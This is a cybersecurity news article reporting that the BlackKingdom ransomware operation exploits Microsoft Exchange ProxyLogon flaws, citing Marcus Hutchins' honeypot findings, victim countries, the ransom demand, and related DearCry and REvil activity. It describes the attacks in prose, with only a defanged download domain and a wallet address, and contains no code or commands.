Microsoft Exchange Servers Targeted By BlackKingdom Ransomware

Microsoft Exchange Servers Targeted By BlackKingdom Ransomware

A security researcher Marcus Hutchins, aka MalwareTechBlog, reported new ransomware operation known as “BlackKingdom” exploiting the Microsoft Exchange Server ProxyLogon vulnerabilities.

Over the weekend, Marcus Hutchins tweeted that a threat actor was targeting Microsoft Exchange servers by exploiting the ProxyLogon vulnerabilities and deploying ransomware.

Having analyzed his honeypot logs, Hutchins determined the threat actor executed a PowerShell script that downloaded the ransomware executable from “yuuuuu44[.]com” website. The attacker then distributes the malware to other computers on the network. The ransomware proceeds by encrypting files and assigning them random extensions and then creating a ransom note in the decrypt_file.TxT file.

BlackKingdom ransom note
Image from BeepingComputer: BlackKingdom ransom note

Honeypots are devices that threat researchers use to lure attackers and monitor their activities as they interact with honeypots. 

According to reports on the ransomware identification site ID Ransomware, the BlackKingdom campaign has been encrypting victim’s devices since March 18th. Michael Gillespie, the creator of ID Ransomware, says his system has received over 30 submissions from victims in the USA, Canada, Switzerland, Austria, Russia, France, Israel, United Kingdom, Germany, Italy, Greece, Australia, and Croatia.

The attackers demand $10,000 in bitcoin payable to one same Bitcoin address (1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT). The address received only one payment on March 18th.

BlackKingdom is the second known ransomware exploiting the Microsoft Exchange ProxyLogon vulnerabilities. The first was the previously unknown family of ransomware DearCry ransomware that was used in attacks earlier this month.

Worth mentioning, last week, Acer suffered a REvil ransomware attack that is suspected to have been exploiting ProxyLogon vulnerabilities, too. Attackers are demanding from the company the largest ransom in history –  $50 million. However, the Taiwanese electronics maker hasn’t confirmed the news. 

Last week, ESET said at least 10 state-backed hacking groups were now trying to exploit the Microsoft Exchange flaws. 

About the author

CIM Team

CIM Team

CyberIntelMag is the trusted authority in cybersecurity, comprised of leading industry experts for over 20 years, dedicated to serving cybersecurity professionals. Our goal is to provide a one-stop shop for knowledge and insight needed to navigate throughout today’s emerging cybersecurity landscape through in-depth coverage of breaking news, tutorials, product reviews, videos and industry influencers.